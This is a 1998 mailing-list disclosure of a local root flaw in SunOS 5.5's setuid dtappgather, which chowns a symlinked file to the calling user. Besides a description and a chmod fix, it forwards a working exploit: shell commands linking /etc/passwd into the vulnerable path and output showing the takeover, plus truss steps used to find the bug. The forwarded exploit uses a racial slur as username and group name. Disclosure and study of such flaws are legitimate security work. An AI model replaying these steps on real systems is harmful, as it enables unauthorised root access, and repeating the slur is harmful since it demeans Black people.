/usr/dt/bin/dtappgather exploit

Mastoras (mastoras@PAPARI.HACK.GR)
Mon, 23 Feb 1998 15:31:16 +0200

Buggy program:
/usr/dt/bin/dtappgather

Description of the problem:
Local users can change the ownership of any file, thus gaining
root priviledges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.

Systems Affected:
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if exists owned by another user.

Quick Fix:
chmod -s /usr/dt/bin/dtappgather

The Exploit:
The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".

Hack wisely,
Mastoras

/*
* Computer Engineering & Informatics Department, Patras, Greece
* Mastor Wins, Fatality! http://www.hack.gr/users/mastoras
*/

---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras@papari.hack.gr>
Reply-To: haxor@hack.gr
To: haxor@papari.hack.gr, Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit

Hello,

I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..

% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]

I hope this was not too lame or well-known :-)

Seeya,
mastoras